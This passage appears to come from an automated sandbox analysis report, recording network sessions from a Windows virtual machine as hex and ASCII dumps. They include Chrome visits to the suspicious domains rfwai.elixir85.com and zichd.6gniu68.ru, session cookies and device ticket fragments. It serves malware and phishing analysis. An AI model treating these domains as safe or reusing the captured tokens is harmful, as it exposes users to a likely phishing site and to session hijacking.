                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                        2024-07-03 19:06:43 UTC1075OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 35 32 0d 0a 4d 53 2d 43 56 3a 20 4d 4c 6b 6a 41 35 6a 52 46 55 75 50 65 74 46 51 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 61 64 39 63 63 32 37 39 37 61 38 65 30 30 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 77 65 64 71 39 69 6b 77 4f 2b 42 6c 6f 57 32 4a 71 59 70 46 78 73 2f 43 74 57 6f 35 48 58 48 5a 6d 59 53 39 65 66 6e 56 2f 67 55 34 4d 33 73 4c 4d 6c 55 42 79 38 6d 2b 41 63 35 64 32 50 34 53 4b 66 38 4d 53 57 6f 2b 59 30 5a 55 57 41 48 56 4a 79 44 61 2f 76 5a 6b 61 55 52 44 6a 77 71 51 77 68 4c 42 78 44 61 34 34 49 77 6a 49
                                                        Data Ascii: ATH 2 CON\DEVICE 1052MS-CV: MLkjA5jRFUuPetFQ.2Context: 5ad9cc2797a8e00<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYwedq9ikwO+BloW2JqYpFxs/CtWo5HXHZmYS9efnV/gU4M3sLMlUBy8m+Ac5d2P4SKf8MSWo+Y0ZUWAHVJyDa/vZkaURDjwqQwhLBxDa44IwjI
                                                        2024-07-03 19:06:43 UTC217OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 36 0d 0a 4d 53 2d 43 56 3a 20 4d 4c 6b 6a 41 35 6a 52 46 55 75 50 65 74 46 51 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 61 64 39 63 63 32 37 39 37 61 38 65 30 30 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                        Data Ascii: BND 3 CON\WNS 0 196MS-CV: MLkjA5jRFUuPetFQ.3Context: 5ad9cc2797a8e00<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                        2024-07-03 19:06:44 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                        Data Ascii: 202 1 CON 58
                                                        2024-07-03 19:06:44 UTC58INData Raw: 4d 53 2d 43 56 3a 20 51 34 42 47 6c 61 72 63 52 45 4f 37 6c 32 63 2b 52 51 66 4a 46 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                        Data Ascii: MS-CV: Q4BGlarcREO7l2c+RQfJFg.0Payload parsing failed.


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18192.168.2.54974340.115.3.253443
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:44 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 5a 6e 41 47 32 54 6d 49 78 30 75 4b 32 55 5a 75 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 37 34 62 31 62 33 62 36 30 65 36 35 30 36 61 0d 0a 0d 0a
                                                        Data Ascii: CNT 1 CON 305MS-CV: ZnAG2TmIx0uK2UZu.1Context: 974b1b3b60e6506a
                                                        2024-07-03 19:06:44 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                        2024-07-03 19:06:44 UTC1076OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 35 33 0d 0a 4d 53 2d 43 56 3a 20 5a 6e 41 47 32 54 6d 49 78 30 75 4b 32 55 5a 75 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 37 34 62 31 62 33 62 36 30 65 36 35 30 36 61 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 64 77 5a 2b 79 69 74 69 2f 4c 51 49 39 4b 42 37 74 65 43 72 7a 45 50 45 6a 71 59 55 6c 74 79 4f 56 56 74 2b 45 6e 7a 4d 61 58 42 34 68 31 51 7a 6c 58 6b 54 72 57 71 41 63 5a 37 57 6e 6c 4f 56 6b 68 38 63 6c 57 72 56 6b 51 64 6c 2b 4f 45 2f 72 35 30 67 74 6b 68 58 6f 6d 46 53 38 4c 62 6d 45 6d 5a 64 75 62 34 5a 63 37 65 44 65
                                                        Data Ascii: ATH 2 CON\DEVICE 1053MS-CV: ZnAG2TmIx0uK2UZu.2Context: 974b1b3b60e6506a<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAdwZ+yiti/LQI9KB7teCrzEPEjqYUltyOVVt+EnzMaXB4h1QzlXkTrWqAcZ7WnlOVkh8clWrVkQdl+OE/r50gtkhXomFS8LbmEmZdub4Zc7eDe
                                                        2024-07-03 19:06:44 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 5a 6e 41 47 32 54 6d 49 78 30 75 4b 32 55 5a 75 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 37 34 62 31 62 33 62 36 30 65 36 35 30 36 61 0d 0a 0d 0a
                                                        Data Ascii: BND 3 CON\QOS 56MS-CV: ZnAG2TmIx0uK2UZu.3Context: 974b1b3b60e6506a
                                                        2024-07-03 19:06:44 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                        Data Ascii: 202 1 CON 58
                                                        2024-07-03 19:06:44 UTC58INData Raw: 4d 53 2d 43 56 3a 20 44 6e 51 74 6d 64 35 77 56 55 57 53 6f 42 7a 5a 71 42 76 47 59 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                        Data Ascii: MS-CV: DnQtmd5wVUWSoBzZqBvGYg.0Payload parsing failed.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        19192.168.2.549738104.21.89.1434433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:48 UTC1321OUTGET /favicon.ico HTTP/1.1
                                                        Host: rfwai.elixir85.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://rfwai.elixir85.com/RfWAi/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6Ik85WmNPeGFtNzFCRmZENHVOYmliOEE9PSIsInZhbHVlIjoiaFdXZDIrMXFxbGxvSHN0UzdvN3hGdHRETGl1MFR3R2h5MFVjMHhiSktjV01GeWsrTHgrT3lwMmpWY00vcGQzaW4yLy8rQ1dDNmQ2VW80WXpZT3VhWVlTUTA2SlExYTdpMVBhT1hkRVdVYVFlMG4rMlh3SUJXVlZJa2kyVVUrTk0iLCJtYWMiOiJhMmRjNTNjM2UyMmI3NjcyMmY0YTE5MjZlOThjMmEyZWViMWQ0MGUzOGU0ZDMwNzk0MDQwNDIwMzVkNzcxODU4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkxpcnF4Um5kMjBRai9UcjRVNHg5Z1E9PSIsInZhbHVlIjoiMVREMG4ydDhhbUhKZzVZbmxXK0pHdnFmKzZVWlF4Q1NuMFRudmlJeWVrYmQvMmpxOFB0Rm1lSFJ2RlZuOTVraHNnZzZQbC85c2xRYVZHNUp1UlNOVDRIQy83S3RaMmM0cFVrYlhadlVFbTdQV0ZIRzdJSHZWbjVQS1BMSnlwb1IiLCJtYWMiOiI0NjE0ZjhjZDdmZDMyYjUxNGYwYjczZWQyZDBmMWNmNTFlMDA0ZTUyNWZmN2Q0M2IwY2Q4MDUyODc1MzM1MDZkIiwidGFnIjoiIn0%3D
                                                        2024-07-03 19:06:48 UTC645INHTTP/1.1 404 Not Found
                                                        Date: Wed, 03 Jul 2024 19:06:48 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Cache-Control: max-age=14400
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xHDPp4JIf6W5%2BDk0JsMWxwf7EwYmvp%2FYfbOr7%2ForBSz4LD77PlTvEMshqmRD6ohVVxxfRe8HG5jHbgbHKm%2Binhk4xnpT%2B8ekopSjxsuZl%2F4g0quhwFoJyeMwEn9OQg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Vary: Accept-Encoding
                                                        alt-svc: h3=":443"; ma=86400
                                                        CF-Cache-Status: HIT
                                                        Age: 1102
                                                        Server: cloudflare
                                                        CF-RAY: 89d927a72a525e68-EWR
                                                        2024-07-03 19:06:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        20192.168.2.549748188.114.97.34433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:49 UTC627OUTGET /dbXLDQtpDSRBuBhVOTWKwXxoBYwUSJTUEAPHETTNOFYTDAHVOKJURMWUFLQPVMBESXVOSRVBAFBDN HTTP/1.1
                                                        Host: zichd.6gniu68.ru
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Origin: https://rfwai.elixir85.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://rfwai.elixir85.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:06:49 UTC604INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:06:49 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ef7dDbhSsCwN5UO4e1yEDG5Stg%2BetjyyjePRA85aDCf6Qzu%2FGZUrVM9u%2FmYVB42w5QnTsOzv5Sz3GxvhoOUZ3ryV6oFIWj1I9nLIzwtqNX654fxiyhKWkWLtFeCauR2uhMxi"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 89d927aabe6143fa-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-07-03 19:06:49 UTC6INData Raw: 31 0d 0a 30 0d 0a
                                                        Data Ascii: 10
                                                        2024-07-03 19:06:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        21192.168.2.54974935.190.80.14433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:49 UTC543OUTOPTIONS /report/v4?s=xHDPp4JIf6W5%2BDk0JsMWxwf7EwYmvp%2FYfbOr7%2ForBSz4LD77PlTvEMshqmRD6ohVVxxfRe8HG5jHbgbHKm%2Binhk4xnpT%2B8ekopSjxsuZl%2F4g0quhwFoJyeMwEn9OQg%3D%3D HTTP/1.1
                                                        Host: a.nel.cloudflare.com
                                                        Connection: keep-alive
                                                        Origin: https://rfwai.elixir85.com
                                                        Access-Control-Request-Method: POST
                                                        Access-Control-Request-Headers: content-type
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:06:49 UTC336INHTTP/1.1 200 OK
                                                        Content-Length: 0
                                                        access-control-max-age: 86400
                                                        access-control-allow-methods: POST, OPTIONS
                                                        access-control-allow-origin: *
                                                        access-control-allow-headers: content-length, content-type
                                                        date: Wed, 03 Jul 2024 19:06:49 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        22192.168.2.54975035.190.80.14433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:49 UTC482OUTPOST /report/v4?s=xHDPp4JIf6W5%2BDk0JsMWxwf7EwYmvp%2FYfbOr7%2ForBSz4LD77PlTvEMshqmRD6ohVVxxfRe8HG5jHbgbHKm%2Binhk4xnpT%2B8ekopSjxsuZl%2F4g0quhwFoJyeMwEn9OQg%3D%3D HTTP/1.1
                                                        Host: a.nel.cloudflare.com
                                                        Connection: keep-alive
                                                        Content-Length: 432
                                                        Content-Type: application/reports+json
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:06:49 UTC432OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 31 32 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 72 66 77 61 69 2e 65 6c 69 78 69 72 38 35 2e 63 6f 6d 2f 52 66 57 41 69 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 38 39 2e 31 34 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72
                                                        Data Ascii: [{"age":0,"body":{"elapsed_time":112,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://rfwai.elixir85.com/RfWAi/","sampling_fraction":1.0,"server_ip":"104.21.89.143","status_code":404,"type":"http.error"},"type":"network-error
                                                        2024-07-03 19:06:50 UTC168INHTTP/1.1 200 OK
                                                        Content-Length: 0
                                                        date: Wed, 03 Jul 2024 19:06:49 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        23192.168.2.549751151.101.194.1374433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:50 UTC624OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                        Host: code.jquery.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://rfwai.elixir85.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:06:50 UTC560INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Length: 89501
                                                        Server: nginx
                                                        Content-Type: application/javascript; charset=utf-8
                                                        Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                        ETag: "28feccc0-15d9d"
                                                        Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                        Access-Control-Allow-Origin: *
                                                        Via: 1.1 varnish, 1.1 varnish
                                                        Accept-Ranges: bytes
                                                        Age: 1438181
                                                        Date: Wed, 03 Jul 2024 19:06:50 GMT
                                                        X-Served-By: cache-lga21931-LGA, cache-ewr18156-EWR
                                                        X-Cache: HIT, HIT
                                                        X-Cache-Hits: 55, 0
                                                        X-Timer: S1720033610.413053,VS0,VE1
                                                        Vary: Accept-Encoding
                                                        2024-07-03 19:06:50 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                        Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                        2024-07-03 19:06:50 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                        Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                        2024-07-03 19:06:50 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                        Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                        2024-07-03 19:06:50 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                        Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                        2024-07-03 19:06:50 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                        Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                        2024-07-03 19:06:50 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
